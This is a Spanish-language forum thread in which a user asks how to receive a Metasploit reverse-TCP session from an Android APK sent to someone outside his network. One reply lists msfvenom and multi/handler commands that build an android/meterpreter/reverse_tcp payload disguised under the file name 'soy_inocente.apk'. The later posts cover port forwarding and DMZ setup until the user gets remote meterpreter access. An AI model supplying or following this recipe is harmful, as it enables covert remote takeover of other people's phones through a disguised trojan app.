[SOLUCIONADO] No puedo realizar un metasploit fuera de mi lan

Iniciado por Scott63, Agosto 19, 2018, 07:54:02 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 19, 2018, 07:54:02 PM Ultima modificación: Septiembre 30, 2018, 10:58:39 AM por xyz

Buenas a todos, tengo unos problemas al intentar hacer un metasploit fuera de mi lan, tengo el consentimiento de la persona a la cual mande el apk de reverse tcp, la cosa es que coloco en LHOST mi ip publica, LPORT 8080, pero al intentar redireccionar el puerto en mi módem, me sale que la ip privada no es válida, al ir a la consola y poner ipconfig me sale: Dirección IPv4 192.168.100.104, mascara de subred 255.255.255.0, gateway 192.168.100.1 ; coloco la IPv4 para redireccionar el puerto y me sale ip invalida, que debo realizar? (No estoy utilizando máquina virtual, ando en Windows)

Agosto 19, 2018, 09:21:43 PM #1 Ultima modificación: Agosto 19, 2018, 09:33:30 PM por p51c0p4t4_666
1 Ese puerto no es el adecuado utliza ejemplo 1024 a 49151 Debido a que pertenece al rango de puertos registrados y pueden ser usado por cualquier   aplicacion abre

2 Abre el puerto en tu modem con la IP que haras la conexion

3Activa los servicios
Código: php
service postgresql start 

4Conectate a tu DB
Código: php
db_connect msf_usuario:password@[IP PRIVADA]:4444/msf_database

5 Cuando creas el payload  ejemplo
Código: php
MSFVENOM -p android/meterpreter/reverse_tcp LHOST=IP PUBLICA LPORT=4444 P R> soy_inocente.apk
  Usa tu ip publica
6 Crea una sesion meterpreter
Código: php
MSFCONSOLE use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST   IP PRIVADA
set LPORT  4444
exploit
En marcha.........


5 Envia el archivo y espera, talvez sea problema de no activar tu puerto o equivocacion de colocacion ip saludos

Gracias por la respuesta, pero mi problema radica al abrir los puertos en la red privada de mi computadora, en ipconfig se muestran asi mis direcciones: Adaptador de LAN inalámbrica Wi-Fi:

   Sufijo DNS específico para la conexión. . : ---------------(estas las tapo)
   Vínculo: dirección IPv6 local. . . : ---------------------
   Dirección IPv4. . . . . . . . . . . . . . : 192.168.100.104
   Máscara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 192.168.100.1
La cosa es que al intentar abrir los puertos para la IPV4(La cual se supone que es la privada) no me deja el modem, me sale ip invalida, probe varios rangos y solo me sirve poner una ip como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nose porque me sucede esto cuando mi ip se supone que es con el 100 en vez del 0, alguien sabe algo? nose si me muestra una "ip privada" ficticia por lo cual sale que es invalida.. y tampoco puedo hacerme una estatica manualmente ya que seria de igual forma No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, gracias de antemano y espero alguien tenga una solucion a eso jeje, todo lo demas lo se hacer..

Deshabilita DMZ a tu nodo y configura tu IP a Statica la cual tienes asignada en el s.o

Gracias a los pocos que contestaron pero de todas formas se aprecia, siendo sincero hasta ahora no encuentro el error exacto ya que no podía redireccionar los puertos en el módem ya que me salía ip invalida, los redireccione desde el router pero tampoco me servía ya que salían cerrados y después de hacer de todo simplemente utilicé una máquina virtual y la puse en DMZ , así que ya recibo el meterpreter fuera de mi lan, gracias de igual forma y se puede cerrar el post  ;)  :D